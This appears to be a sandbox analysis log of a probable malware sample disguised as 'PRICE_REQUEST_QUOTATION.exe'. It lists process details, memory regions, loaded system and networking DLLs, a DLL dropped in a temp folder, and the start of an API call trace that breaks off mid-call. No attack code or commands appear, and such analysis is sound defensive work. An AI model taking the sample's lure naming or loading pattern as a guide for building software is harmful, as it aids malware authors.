# Flog Txt Version 1 # Analyzer Version: 4.3.0 # Analyzer Build Date: Sep 20 2021 05:59:55 # Log Creation Date: 28.09.2021 06:55:33.440 Process: id = "1" image_name = "price_request_quotation.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\price_request_quotation.exe" page_root = "0x5730c000" os_pid = "0x1280" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x664" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\PRICE_REQUEST_QUOTATION.exe\" " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 118 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 119 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 120 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 121 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 122 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 123 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 124 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 125 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 126 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 127 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "price_request_quotation.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\PRICE_REQUEST_QUOTATION.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\price_request_quotation.exe") Region: id = 128 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 129 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 130 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 131 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 132 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 133 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 271 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 272 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 273 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 274 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 275 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 276 start_va = 0x510000 end_va = 0x7dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 277 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 278 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 279 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 280 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 281 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 282 start_va = 0x73ee0000 end_va = 0x73f71fff monitored = 0 entry_point = 0x73f20380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 283 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 284 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 285 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 286 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 287 start_va = 0x510000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 288 start_va = 0x550000 end_va = 0x64ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 289 start_va = 0x6e0000 end_va = 0x7dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 290 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 291 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 292 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 293 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 294 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 295 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 296 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 297 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 298 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 299 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 300 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 301 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 302 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 303 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 304 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 305 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 306 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 307 start_va = 0x6c540000 end_va = 0x6c5d1fff monitored = 0 entry_point = 0x6c54dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 308 start_va = 0x650000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 309 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 310 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 311 start_va = 0x8e0000 end_va = 0xa67fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008e0000" filename = "" Region: id = 312 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 313 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 314 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 315 start_va = 0xa70000 end_va = 0xbf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a70000" filename = "" Region: id = 316 start_va = 0xc00000 end_va = 0x1ffffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c00000" filename = "" Region: id = 317 start_va = 0x2000000 end_va = 0x209ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 318 start_va = 0x20a0000 end_va = 0x229ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 319 start_va = 0x20a0000 end_va = 0x2130fff monitored = 0 entry_point = 0x20d8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 320 start_va = 0x2290000 end_va = 0x229ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002290000" filename = "" Region: id = 321 start_va = 0x70040000 end_va = 0x700b4fff monitored = 0 entry_point = 0x70079a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 322 start_va = 0x690000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 323 start_va = 0x70020000 end_va = 0x70038fff monitored = 0 entry_point = 0x700247e0 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 324 start_va = 0x74620000 end_va = 0x74a2afff monitored = 0 entry_point = 0x7464adf0 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 325 start_va = 0x71f20000 end_va = 0x7206afff monitored = 0 entry_point = 0x71f81660 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 326 start_va = 0x743f0000 end_va = 0x74481fff monitored = 0 entry_point = 0x74428cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 327 start_va = 0x6ea60000 end_va = 0x6ea7cfff monitored = 0 entry_point = 0x6ea63b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 328 start_va = 0x6c4e0000 end_va = 0x6c533fff monitored = 0 entry_point = 0x6c4fdc50 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\SysWOW64\\oleacc.dll" (normalized: "c:\\windows\\syswow64\\oleacc.dll") Region: id = 329 start_va = 0x1e0000 end_va = 0x1e1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\SysWOW64\\oleaccrc.dll" (normalized: "c:\\windows\\syswow64\\oleaccrc.dll") Region: id = 330 start_va = 0x74360000 end_va = 0x743e3fff monitored = 0 entry_point = 0x74386220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 331 start_va = 0x6c4d0000 end_va = 0x6c4d7fff monitored = 0 entry_point = 0x6c4d17b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 332 start_va = 0x6c4c0000 end_va = 0x6c4c5fff monitored = 0 entry_point = 0x6c4c1570 region_type = mapped_file name = "shfolder.dll" filename = "\\Windows\\SysWOW64\\shfolder.dll" (normalized: "c:\\windows\\syswow64\\shfolder.dll") Region: id = 333 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 334 start_va = 0x22a0000 end_va = 0x25d6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 335 start_va = 0x2000000 end_va = 0x203ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 336 start_va = 0x2090000 end_va = 0x209ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002090000" filename = "" Region: id = 337 start_va = 0x20a0000 end_va = 0x219ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 338 start_va = 0x690000 end_va = 0x690fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 339 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 340 start_va = 0x6a0000 end_va = 0x6a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 341 start_va = 0x6c0000 end_va = 0x6c3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 342 start_va = 0x2040000 end_va = 0x2052fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000a.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db") Region: id = 343 start_va = 0x6d0000 end_va = 0x6d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006d0000" filename = "" Region: id = 344 start_va = 0x21a0000 end_va = 0x21dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021a0000" filename = "" Region: id = 345 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 346 start_va = 0x6c430000 end_va = 0x6c4b0fff monitored = 0 entry_point = 0x6c436310 region_type = mapped_file name = "riched20.dll" filename = "\\Windows\\SysWOW64\\riched20.dll" (normalized: "c:\\windows\\syswow64\\riched20.dll") Region: id = 347 start_va = 0x6c410000 end_va = 0x6c425fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 348 start_va = 0x6c3d0000 end_va = 0x6c400fff monitored = 0 entry_point = 0x6c3e22d0 region_type = mapped_file name = "msls31.dll" filename = "\\Windows\\SysWOW64\\msls31.dll" (normalized: "c:\\windows\\syswow64\\msls31.dll") Region: id = 349 start_va = 0x6c0000 end_va = 0x6c3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 350 start_va = 0x74120000 end_va = 0x7423efff monitored = 0 entry_point = 0x74165980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 351 start_va = 0x2060000 end_va = 0x2060fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002060000" filename = "" Region: id = 352 start_va = 0x26e0000 end_va = 0x279bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026e0000" filename = "" Region: id = 353 start_va = 0x2060000 end_va = 0x2063fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002060000" filename = "" Region: id = 354 start_va = 0x2070000 end_va = 0x2071fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002070000" filename = "" Region: id = 355 start_va = 0x2080000 end_va = 0x2080fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002080000" filename = "" Region: id = 356 start_va = 0x21e0000 end_va = 0x21e4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui") Region: id = 357 start_va = 0x21f0000 end_va = 0x21fbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000021f0000" filename = "" Region: id = 358 start_va = 0x6c3c0000 end_va = 0x6c3cffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "akepwc.dll" filename = "\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp\\akepwc.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nspcdfe.tmp\\akepwc.dll") Region: id = 359 start_va = 0x21f0000 end_va = 0x21f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000021f0000" filename = "" Region: id = 360 start_va = 0x75e90000 end_va = 0x75eeefff monitored = 0 entry_point = 0x75e94af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 361 start_va = 0x6c3b0000 end_va = 0x6c3b7fff monitored = 0 entry_point = 0x6c3b1740 region_type = mapped_file name = "wsock32.dll" filename = "\\Windows\\SysWOW64\\wsock32.dll" (normalized: "c:\\windows\\syswow64\\wsock32.dll") Region: id = 362 start_va = 0x701a0000 end_va = 0x703acfff monitored = 0 entry_point = 0x7028acb0 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 363 start_va = 0x71a70000 end_va = 0x71abefff monitored = 0 entry_point = 0x71a7d850 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 364 start_va = 0x27a0000 end_va = 0xe65cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027a0000" filename = "" Region: id = 365 start_va = 0x2200000 end_va = 0x2234fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 382 start_va = 0xe660000 end_va = 0xe7d8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e660000" filename = "" Region: id = 383 start_va = 0xe7e0000 end_va = 0xe95afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e7e0000" filename = "" Region: id = 385 start_va = 0xe660000 end_va = 0xe7d8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e660000" filename = "" Region: id = 386 start_va = 0xe7e0000 end_va = 0xe95afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e7e0000" filename = "" Region: id = 387 start_va = 0xe660000 end_va = 0xe7d8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e660000" filename = "" Region: id = 388 start_va = 0xe7e0000 end_va = 0xe95afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e7e0000" filename = "" Region: id = 389 start_va = 0xe660000 end_va = 0xe7d8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e660000" filename = "" Region: id = 390 start_va = 0xe7e0000 end_va = 0xe95afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e7e0000" filename = "" Region: id = 391 start_va = 0xe660000 end_va = 0xe7d8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e660000" filename = "" Region: id = 392 start_va = 0xe7e0000 end_va = 0xe95afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e7e0000" filename = "" Thread: id = 1 os_tid = 0xf78 [0088.399] SetErrorMode (uMode=0x8001) returned 0x0 [0088.709] GetVersion () returned 0x23f00206 [0088.709] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x74530000 [0088.709] GetProcAddress (hModule=0x74530000, lpProcName="SetDefaultDllDirectories") returned 0x76d56270 [0088.709] SetDefaultDllDirectories (DirectoryFlags=0xc00) returned 1 [0088.709] GetSystemDirectoryA (in: lpBuffer=0x19fcc4, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0088.709] wsprintfA (in: param_1=0x19fcd7, param_2="%s%s.dll" | out: param_1="\\UXTHEME.dll") returned 12 [0088.709] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\UXTHEME.dll", hFile=0x0, dwFlags=0x8) returned 0x70040000 [0089.590] lstrlenA (lpString="UXTHEME") returned 7 [0089.590] GetSystemDirectoryA (in: lpBuffer=0x19fcc4, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0089.590] wsprintfA (in: param_1=0x19fcd7, param_2="%s%s.dll" | out: param_1="\\USERENV.dll") returned 12 [0089.590] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\USERENV.dll", hFile=0x0, dwFlags=0x8) returned 0x70020000 [0090.183] lstrlenA (lpString="USERENV") returned 7 [0090.184] GetSystemDirectoryA (in: lpBuffer=0x19fcc4, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0090.184] wsprintfA (in: param_1=0x19fcd7, param_2="%s%s.dll" | out: param_1="\\SETUPAPI.dll") returned 13 [0090.184] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\SETUPAPI.dll", hFile=0x0, dwFlags=0x8) returned 0x74620000 [0091.169] lstrlenA (lpString="SETUPAPI") returned 8 [0091.169] GetSystemDirectoryA (in: lpBuffer=0x19fcc4, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0091.169] wsprintfA (in: param_1=0x19fcd7, param_2="%s%s.dll" | out: param_1="\\APPHELP.dll") returned 12 [0091.169] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\APPHELP.dll", hFile=0x0, dwFlags=0x8) returned 0x73ee0000 [0091.169] lstrlenA (lpString="APPHELP") returned 7 [0091.169] GetSystemDirectoryA (in: lpBuffer=0x19fcc4, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0091.169] wsprintfA (in: param_1=0x19fcd7, param_2="%s%s.dll" | out: param_1="\\PROPSYS.dll") returned 12 [0091.169] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\PROPSYS.dll", hFile=0x0, dwFlags=0x8) returned 0x71f20000 [0091.930] lstrlenA (lpString="PROPSYS") returned 7 [0091.930] GetSystemDirectoryA (in: lpBuffer=0x19fcc4, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0091.930] wsprintfA (in: param_1=0x19fcd7, param_2="%s%s.dll" | out: param_1="\\DWMAPI.dll") returned 11 [0091.930] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\DWMAPI.dll", hFile=0x0, dwFlags=0x8) returned 0x6ea60000 [0092.590] lstrlenA (lpString="DWMAPI") returned 6 [0092.590] GetSystemDirectoryA (in: lpBuffer=0x19fcc4, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0092.590] wsprintfA 